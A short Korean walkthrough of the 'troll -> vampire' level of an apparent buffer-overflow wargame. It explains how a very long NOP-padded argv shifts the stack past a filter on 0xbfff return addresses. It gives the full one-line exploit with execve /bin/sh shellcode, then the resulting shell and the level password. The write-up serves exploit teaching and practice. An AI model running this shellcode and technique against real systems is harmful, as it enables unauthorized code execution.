troll -> vampire

argv 길이 제한이 없어졌다.

대신 RET 가 bf 다음 ff 면 거른다.

따라서 ff 주소를 뛰어넘을

bffe~~~ 주소를 찾아야 한다.

argv 길이 제한이 없으므로, argv[1] 뒤에 NOP를 많이 붙여줌으로써 buffer 의 시작위치를 뒤로 보낸다.

[troll@localhost asdf]$ ../vampire `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" + "\x90"*19 + "\x30\x72\xfe\xbf" + "\x90"*100444'`

bash$ my-pass
euid = 509
music world
bash$